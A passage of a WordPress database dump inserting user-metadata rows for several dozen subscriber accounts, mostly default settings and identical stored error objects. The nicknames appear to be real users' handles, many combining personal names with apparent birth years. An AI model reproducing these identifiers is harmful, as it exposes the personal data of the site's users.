(23724, 1816, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23725, 1816, 'cyb_user_level', '0'),
(23726, 1816, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23727, 1816, 'default_password_nag', '1'),
(23728, 1817, 'nickname', 'michaelmelissa6191972'),
(23729, 1817, 'first_name', ''),
(23730, 1817, 'last_name', ''),
(23731, 1817, 'description', ''),
(23732, 1817, 'rich_editing', 'true'),
(23733, 1817, 'comment_shortcuts', 'false'),
(23734, 1817, 'admin_color', 'fresh'),
(23735, 1817, 'use_ssl', '0'),
(23736, 1817, 'show_admin_bar_front', 'true'),
(23737, 1817, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23738, 1817, 'cyb_user_level', '0'),
(23739, 1817, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23740, 1817, 'default_password_nag', '1'),
(23741, 1818, 'nickname', 'lujan.jose1996'),
(23742, 1818, 'first_name', ''),
(23743, 1818, 'last_name', ''),
(23744, 1818, 'description', ''),
(23745, 1818, 'rich_editing', 'true'),
(23746, 1818, 'comment_shortcuts', 'false'),
(23747, 1818, 'admin_color', 'fresh'),
(23748, 1818, 'use_ssl', '0'),
(23749, 1818, 'show_admin_bar_front', 'true'),
(23750, 1818, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23751, 1818, 'cyb_user_level', '0'),
(23752, 1818, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23753, 1818, 'default_password_nag', '1'),
(23754, 1819, 'nickname', 'doublet401979'),
(23755, 1819, 'first_name', ''),
(23756, 1819, 'last_name', ''),
(23757, 1819, 'description', ''),
(23758, 1819, 'rich_editing', 'true'),
(23759, 1819, 'comment_shortcuts', 'false'),
(23760, 1819, 'admin_color', 'fresh'),
(23761, 1819, 'use_ssl', '0'),
(23762, 1819, 'show_admin_bar_front', 'true'),
(23763, 1819, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23764, 1819, 'cyb_user_level', '0'),
(23765, 1819, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23766, 1819, 'default_password_nag', '1'),
(23767, 1820, 'nickname', 'emfannin1955'),
(23768, 1820, 'first_name', ''),
(23769, 1820, 'last_name', ''),
(23770, 1820, 'description', ''),
(23771, 1820, 'rich_editing', 'true'),
(23772, 1820, 'comment_shortcuts', 'false'),
(23773, 1820, 'admin_color', 'fresh'),
(23774, 1820, 'use_ssl', '0'),
(23775, 1820, 'show_admin_bar_front', 'true'),
(23776, 1820, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23777, 1820, 'cyb_user_level', '0'),
(23778, 1820, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23779, 1820, 'default_password_nag', '1'),
(23780, 1821, 'nickname', 'j.vaque2003'),
(23781, 1821, 'first_name', ''),
(23782, 1821, 'last_name', ''),
(23783, 1821, 'description', ''),
(23784, 1821, 'rich_editing', 'true'),
(23785, 1821, 'comment_shortcuts', 'false'),
(23786, 1821, 'admin_color', 'fresh'),
(23787, 1821, 'use_ssl', '0'),
(23788, 1821, 'show_admin_bar_front', 'true'),
(23789, 1821, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23790, 1821, 'cyb_user_level', '0'),
(23791, 1821, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23792, 1821, 'default_password_nag', '1'),
(23793, 1822, 'nickname', 'lang13831978'),
(23794, 1822, 'first_name', ''),
(23795, 1822, 'last_name', ''),
(23796, 1822, 'description', ''),
(23797, 1822, 'rich_editing', 'true'),
(23798, 1822, 'comment_shortcuts', 'false'),
(23799, 1822, 'admin_color', 'fresh'),
(23800, 1822, 'use_ssl', '0'),
(23801, 1822, 'show_admin_bar_front', 'true'),
(23802, 1822, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23803, 1822, 'cyb_user_level', '0'),
(23804, 1822, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23805, 1822, 'default_password_nag', '1'),
(23806, 1823, 'nickname', 'stuart.irving1978'),
(23807, 1823, 'first_name', ''),
(23808, 1823, 'last_name', ''),
(23809, 1823, 'description', ''),
(23810, 1823, 'rich_editing', 'true'),
(23811, 1823, 'comment_shortcuts', 'false'),
(23812, 1823, 'admin_color', 'fresh'),
(23813, 1823, 'use_ssl', '0'),
(23814, 1823, 'show_admin_bar_front', 'true'),
(23815, 1823, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23816, 1823, 'cyb_user_level', '0'),
(23817, 1823, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23818, 1823, 'default_password_nag', '1'),
(23819, 1824, 'nickname', 'dlkaheny2002'),
(23820, 1824, 'first_name', ''),
(23821, 1824, 'last_name', ''),
(23822, 1824, 'description', ''),
(23823, 1824, 'rich_editing', 'true'),
(23824, 1824, 'comment_shortcuts', 'false'),
(23825, 1824, 'admin_color', 'fresh'),
(23826, 1824, 'use_ssl', '0'),
(23827, 1824, 'show_admin_bar_front', 'true'),
(23828, 1824, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23829, 1824, 'cyb_user_level', '0'),
(23830, 1824, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23831, 1824, 'default_password_nag', '1'),
(23832, 1825, 'nickname', 'stephanie_rammes1986'),
(23833, 1825, 'first_name', ''),
(23834, 1825, 'last_name', ''),
(23835, 1825, 'description', ''),
(23836, 1825, 'rich_editing', 'true'),
(23837, 1825, 'comment_shortcuts', 'false'),
(23838, 1825, 'admin_color', 'fresh'),
(23839, 1825, 'use_ssl', '0'),
(23840, 1825, 'show_admin_bar_front', 'true'),
(23841, 1825, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23842, 1825, 'cyb_user_level', '0'),
(23843, 1825, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23844, 1825, 'default_password_nag', '1'),
(23845, 1826, 'nickname', 'manny.malandrakis1950'),
(23846, 1826, 'first_name', ''),
(23847, 1826, 'last_name', ''),
(23848, 1826, 'description', ''),
(23849, 1826, 'rich_editing', 'true'),
(23850, 1826, 'comment_shortcuts', 'false'),
(23851, 1826, 'admin_color', 'fresh'),
(23852, 1826, 'use_ssl', '0'),
(23853, 1826, 'show_admin_bar_front', 'true'),
(23854, 1826, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23855, 1826, 'cyb_user_level', '0'),
(23856, 1826, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23857, 1826, 'default_password_nag', '1'),
(23858, 1827, 'nickname', 'zcahoon2007'),
(23859, 1827, 'first_name', ''),
(23860, 1827, 'last_name', ''),
(23861, 1827, 'description', ''),
(23862, 1827, 'rich_editing', 'true'),
(23863, 1827, 'comment_shortcuts', 'false'),
(23864, 1827, 'admin_color', 'fresh'),
(23865, 1827, 'use_ssl', '0'),
(23866, 1827, 'show_admin_bar_front', 'true'),
(23867, 1827, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23868, 1827, 'cyb_user_level', '0'),
(23869, 1827, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23870, 1827, 'default_password_nag', '1'),
(23871, 1828, 'nickname', 'jnwlsn1956'),
(23872, 1828, 'first_name', ''),
(23873, 1828, 'last_name', ''),
(23874, 1828, 'description', ''),
(23875, 1828, 'rich_editing', 'true'),
(23876, 1828, 'comment_shortcuts', 'false'),
(23877, 1828, 'admin_color', 'fresh'),
(23878, 1828, 'use_ssl', '0'),
(23879, 1828, 'show_admin_bar_front', 'true'),
(23880, 1828, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23881, 1828, 'cyb_user_level', '0'),
(23882, 1828, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23883, 1828, 'default_password_nag', '1'),
(23884, 1829, 'nickname', 'gemmasmyth862006'),
(23885, 1829, 'first_name', ''),
(23886, 1829, 'last_name', ''),
(23887, 1829, 'description', ''),
(23888, 1829, 'rich_editing', 'true'),
(23889, 1829, 'comment_shortcuts', 'false'),
(23890, 1829, 'admin_color', 'fresh'),
(23891, 1829, 'use_ssl', '0'),
(23892, 1829, 'show_admin_bar_front', 'true'),
(23893, 1829, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23894, 1829, 'cyb_user_level', '0'),
(23895, 1829, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23896, 1829, 'default_password_nag', '1'),
(23897, 1830, 'nickname', 'holgerat1958'),
(23898, 1830, 'first_name', ''),
(23899, 1830, 'last_name', ''),
(23900, 1830, 'description', ''),
(23901, 1830, 'rich_editing', 'true'),
(23902, 1830, 'comment_shortcuts', 'false'),
(23903, 1830, 'admin_color', 'fresh'),
(23904, 1830, 'use_ssl', '0'),
(23905, 1830, 'show_admin_bar_front', 'true'),
(23906, 1830, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23907, 1830, 'cyb_user_level', '0'),
(23908, 1830, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23909, 1830, 'default_password_nag', '1'),
(23910, 1831, 'nickname', 'lisamrobo1958'),
(23911, 1831, 'first_name', ''),
(23912, 1831, 'last_name', ''),
(23913, 1831, 'description', ''),
(23914, 1831, 'rich_editing', 'true'),
(23915, 1831, 'comment_shortcuts', 'false'),
(23916, 1831, 'admin_color', 'fresh'),
(23917, 1831, 'use_ssl', '0'),
(23918, 1831, 'show_admin_bar_front', 'true'),
(23919, 1831, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23920, 1831, 'cyb_user_level', '0'),
(23921, 1831, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23922, 1831, 'default_password_nag', '1'),
(23923, 1832, 'nickname', 'lmd5292008'),
(23924, 1832, 'first_name', ''),
(23925, 1832, 'last_name', ''),
(23926, 1832, 'description', ''),
(23927, 1832, 'rich_editing', 'true'),
(23928, 1832, 'comment_shortcuts', 'false'),
(23929, 1832, 'admin_color', 'fresh'),
(23930, 1832, 'use_ssl', '0'),
(23931, 1832, 'show_admin_bar_front', 'true'),
(23932, 1832, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23933, 1832, 'cyb_user_level', '0'),
(23934, 1832, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23935, 1832, 'default_password_nag', '1'),
(23936, 1833, 'nickname', 'wilsonluisboutique1963'),
(23937, 1833, 'first_name', ''),
(23938, 1833, 'last_name', ''),
(23939, 1833, 'description', ''),
(23940, 1833, 'rich_editing', 'true'),
(23941, 1833, 'comment_shortcuts', 'false'),
(23942, 1833, 'admin_color', 'fresh'),
(23943, 1833, 'use_ssl', '0'),
(23944, 1833, 'show_admin_bar_front', 'true'),
(23945, 1833, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23946, 1833, 'cyb_user_level', '0'),
(23947, 1833, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23948, 1833, 'default_password_nag', '1'),
(23949, 1834, 'nickname', 'pouf382000'),
(23950, 1834, 'first_name', ''),
(23951, 1834, 'last_name', ''),
(23952, 1834, 'description', ''),
(23953, 1834, 'rich_editing', 'true'),
(23954, 1834, 'comment_shortcuts', 'false'),
(23955, 1834, 'admin_color', 'fresh'),
(23956, 1834, 'use_ssl', '0'),
(23957, 1834, 'show_admin_bar_front', 'true'),
(23958, 1834, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23959, 1834, 'cyb_user_level', '0'),
(23960, 1834, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23961, 1834, 'default_password_nag', '1'),
(23962, 1835, 'nickname', 'natsapova2000'),
(23963, 1835, 'first_name', ''),
(23964, 1835, 'last_name', ''),
(23965, 1835, 'description', ''),
(23966, 1835, 'rich_editing', 'true'),
(23967, 1835, 'comment_shortcuts', 'false'),
(23968, 1835, 'admin_color', 'fresh'),
(23969, 1835, 'use_ssl', '0'),
(23970, 1835, 'show_admin_bar_front', 'true'),
(23971, 1835, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23972, 1835, 'cyb_user_level', '0'),
(23973, 1835, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23974, 1835, 'default_password_nag', '1'),
(23975, 1836, 'nickname', 'omelendez931955'),
(23976, 1836, 'first_name', ''),
(23977, 1836, 'last_name', ''),
(23978, 1836, 'description', ''),
(23979, 1836, 'rich_editing', 'true'),
(23980, 1836, 'comment_shortcuts', 'false'),
(23981, 1836, 'admin_color', 'fresh'),
(23982, 1836, 'use_ssl', '0'),
(23983, 1836, 'show_admin_bar_front', 'true'),
(23984, 1836, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23985, 1836, 'cyb_user_level', '0'),
(23986, 1836, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(23987, 1836, 'default_password_nag', '1'),
(23988, 1837, 'nickname', 'w2g4ua2003'),
(23989, 1837, 'first_name', ''),
(23990, 1837, 'last_name', ''),
(23991, 1837, 'description', ''),
(23992, 1837, 'rich_editing', 'true'),
(23993, 1837, 'comment_shortcuts', 'false'),
(23994, 1837, 'admin_color', 'fresh'),
(23995, 1837, 'use_ssl', '0'),
(23996, 1837, 'show_admin_bar_front', 'true'),
(23997, 1837, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(23998, 1837, 'cyb_user_level', '0'),
(23999, 1837, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24000, 1837, 'default_password_nag', '1'),
(24001, 1838, 'nickname', 'ebochow1963'),
(24002, 1838, 'first_name', ''),
(24003, 1838, 'last_name', ''),
(24004, 1838, 'description', ''),
(24005, 1838, 'rich_editing', 'true'),
(24006, 1838, 'comment_shortcuts', 'false'),
(24007, 1838, 'admin_color', 'fresh'),
(24008, 1838, 'use_ssl', '0'),
(24009, 1838, 'show_admin_bar_front', 'true'),
(24010, 1838, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24011, 1838, 'cyb_user_level', '0'),
(24012, 1838, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24013, 1838, 'default_password_nag', '1'),
(24014, 1839, 'nickname', 'flbchdawg1979'),
(24015, 1839, 'first_name', ''),
(24016, 1839, 'last_name', ''),
(24017, 1839, 'description', ''),
(24018, 1839, 'rich_editing', 'true'),
(24019, 1839, 'comment_shortcuts', 'false'),
(24020, 1839, 'admin_color', 'fresh'),
(24021, 1839, 'use_ssl', '0'),
(24022, 1839, 'show_admin_bar_front', 'true'),
(24023, 1839, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24024, 1839, 'cyb_user_level', '0'),
(24025, 1839, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24026, 1839, 'default_password_nag', '1'),
(24027, 1840, 'nickname', 'cynthia-rocha1954'),
(24028, 1840, 'first_name', ''),
(24029, 1840, 'last_name', ''),
(24030, 1840, 'description', ''),
(24031, 1840, 'rich_editing', 'true'),
(24032, 1840, 'comment_shortcuts', 'false'),
(24033, 1840, 'admin_color', 'fresh'),
(24034, 1840, 'use_ssl', '0'),
(24035, 1840, 'show_admin_bar_front', 'true'),
(24036, 1840, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24037, 1840, 'cyb_user_level', '0'),
(24038, 1840, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24039, 1840, 'default_password_nag', '1'),
(24040, 1841, 'nickname', 'a_heyliger1983'),
(24041, 1841, 'first_name', ''),
(24042, 1841, 'last_name', ''),
(24043, 1841, 'description', ''),
(24044, 1841, 'rich_editing', 'true'),
(24045, 1841, 'comment_shortcuts', 'false'),
(24046, 1841, 'admin_color', 'fresh'),
(24047, 1841, 'use_ssl', '0'),
(24048, 1841, 'show_admin_bar_front', 'true'),
(24049, 1841, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24050, 1841, 'cyb_user_level', '0'),
(24051, 1841, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24052, 1841, 'default_password_nag', '1'),
(24053, 1842, 'nickname', 'clutchc2008'),
(24054, 1842, 'first_name', ''),
(24055, 1842, 'last_name', ''),
(24056, 1842, 'description', ''),
(24057, 1842, 'rich_editing', 'true'),
(24058, 1842, 'comment_shortcuts', 'false'),
(24059, 1842, 'admin_color', 'fresh'),
(24060, 1842, 'use_ssl', '0'),
(24061, 1842, 'show_admin_bar_front', 'true'),
(24062, 1842, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24063, 1842, 'cyb_user_level', '0'),
(24064, 1842, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24065, 1842, 'default_password_nag', '1'),
(24066, 1843, 'nickname', 'sasso5601999'),
(24067, 1843, 'first_name', ''),
(24068, 1843, 'last_name', ''),
(24069, 1843, 'description', ''),
(24070, 1843, 'rich_editing', 'true'),
(24071, 1843, 'comment_shortcuts', 'false'),
(24072, 1843, 'admin_color', 'fresh'),
(24073, 1843, 'use_ssl', '0'),
(24074, 1843, 'show_admin_bar_front', 'true'),
(24075, 1843, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24076, 1843, 'cyb_user_level', '0'),
(24077, 1843, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24078, 1843, 'default_password_nag', '1'),
(24079, 1844, 'nickname', 'mccormickclan1953'),
(24080, 1844, 'first_name', ''),
(24081, 1844, 'last_name', ''),
(24082, 1844, 'description', ''),
(24083, 1844, 'rich_editing', 'true'),
(24084, 1844, 'comment_shortcuts', 'false'),
(24085, 1844, 'admin_color', 'fresh'),
(24086, 1844, 'use_ssl', '0'),
(24087, 1844, 'show_admin_bar_front', 'true'),
(24088, 1844, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24089, 1844, 'cyb_user_level', '0'),
(24090, 1844, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24091, 1844, 'default_password_nag', '1'),
(24092, 1845, 'nickname', 'bobshelby1141999'),
(24093, 1845, 'first_name', ''),
(24094, 1845, 'last_name', '');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(24095, 1845, 'description', ''),
(24096, 1845, 'rich_editing', 'true'),
(24097, 1845, 'comment_shortcuts', 'false'),
(24098, 1845, 'admin_color', 'fresh'),
(24099, 1845, 'use_ssl', '0'),
(24100, 1845, 'show_admin_bar_front', 'true'),
(24101, 1845, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24102, 1845, 'cyb_user_level', '0'),
(24103, 1845, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24104, 1845, 'default_password_nag', '1'),
(24105, 1846, 'nickname', 'plantejr1957'),
(24106, 1846, 'first_name', ''),
(24107, 1846, 'last_name', ''),
(24108, 1846, 'description', ''),
(24109, 1846, 'rich_editing', 'true'),
(24110, 1846, 'comment_shortcuts', 'false'),
(24111, 1846, 'admin_color', 'fresh'),
(24112, 1846, 'use_ssl', '0'),
(24113, 1846, 'show_admin_bar_front', 'true'),
(24114, 1846, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24115, 1846, 'cyb_user_level', '0'),
(24116, 1846, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24117, 1846, 'default_password_nag', '1'),
(24118, 1847, 'nickname', 'ppadiotis1986'),
(24119, 1847, 'first_name', ''),
(24120, 1847, 'last_name', ''),
(24121, 1847, 'description', ''),
(24122, 1847, 'rich_editing', 'true'),
(24123, 1847, 'comment_shortcuts', 'false'),
(24124, 1847, 'admin_color', 'fresh'),
(24125, 1847, 'use_ssl', '0'),
(24126, 1847, 'show_admin_bar_front', 'true'),
(24127, 1847, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24128, 1847, 'cyb_user_level', '0'),
(24129, 1847, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24130, 1847, 'default_password_nag', '1'),
(24131, 1848, 'nickname', 'nako1992'),
(24132, 1848, 'first_name', ''),
(24133, 1848, 'last_name', ''),
(24134, 1848, 'description', ''),
(24135, 1848, 'rich_editing', 'true'),
(24136, 1848, 'comment_shortcuts', 'false'),
(24137, 1848, 'admin_color', 'fresh'),
(24138, 1848, 'use_ssl', '0'),
(24139, 1848, 'show_admin_bar_front', 'true'),
(24140, 1848, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24141, 1848, 'cyb_user_level', '0'),
(24142, 1848, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24143, 1848, 'default_password_nag', '1'),
(24144, 1849, 'nickname', 'jballgrad20091974'),
(24145, 1849, 'first_name', ''),
(24146, 1849, 'last_name', ''),
(24147, 1849, 'description', ''),
(24148, 1849, 'rich_editing', 'true'),
(24149, 1849, 'comment_shortcuts', 'false'),
(24150, 1849, 'admin_color', 'fresh'),
(24151, 1849, 'use_ssl', '0'),
(24152, 1849, 'show_admin_bar_front', 'true'),
(24153, 1849, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24154, 1849, 'cyb_user_level', '0'),
(24155, 1849, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24156, 1849, 'default_password_nag', '1'),
(24157, 1850, 'nickname', 'cloutetj1957'),
(24158, 1850, 'first_name', ''),
(24159, 1850, 'last_name', ''),
(24160, 1850, 'description', ''),
(24161, 1850, 'rich_editing', 'true'),
(24162, 1850, 'comment_shortcuts', 'false'),
(24163, 1850, 'admin_color', 'fresh'),
(24164, 1850, 'use_ssl', '0'),
(24165, 1850, 'show_admin_bar_front', 'true'),
(24166, 1850, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24167, 1850, 'cyb_user_level', '0'),
(24168, 1850, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24169, 1850, 'default_password_nag', '1'),
(24170, 1851, 'nickname', 'jbellgrad20091952'),
(24171, 1851, 'first_name', ''),
(24172, 1851, 'last_name', ''),
(24173, 1851, 'description', ''),
(24174, 1851, 'rich_editing', 'true'),
(24175, 1851, 'comment_shortcuts', 'false'),
(24176, 1851, 'admin_color', 'fresh'),
(24177, 1851, 'use_ssl', '0'),
(24178, 1851, 'show_admin_bar_front', 'true'),
(24179, 1851, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24180, 1851, 'cyb_user_level', '0'),
(24181, 1851, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24182, 1851, 'default_password_nag', '1'),
(24183, 1852, 'nickname', 'fernandoibanhes1990'),
(24184, 1852, 'first_name', ''),
(24185, 1852, 'last_name', ''),
(24186, 1852, 'description', ''),
(24187, 1852, 'rich_editing', 'true'),
(24188, 1852, 'comment_shortcuts', 'false'),
(24189, 1852, 'admin_color', 'fresh'),
(24190, 1852, 'use_ssl', '0'),
(24191, 1852, 'show_admin_bar_front', 'true'),
(24192, 1852, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24193, 1852, 'cyb_user_level', '0'),
(24194, 1852, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24195, 1852, 'default_password_nag', '1'),
(24196, 1853, 'nickname', 'vedad761972'),
(24197, 1853, 'first_name', ''),
(24198, 1853, 'last_name', ''),
(24199, 1853, 'description', ''),
(24200, 1853, 'rich_editing', 'true'),
(24201, 1853, 'comment_shortcuts', 'false'),
(24202, 1853, 'admin_color', 'fresh'),
(24203, 1853, 'use_ssl', '0'),
(24204, 1853, 'show_admin_bar_front', 'true'),
(24205, 1853, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24206, 1853, 'cyb_user_level', '0'),
(24207, 1853, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24208, 1853, 'default_password_nag', '1'),
(24209, 1854, 'nickname', 'rrrhars1965'),
(24210, 1854, 'first_name', ''),
(24211, 1854, 'last_name', ''),
(24212, 1854, 'description', ''),
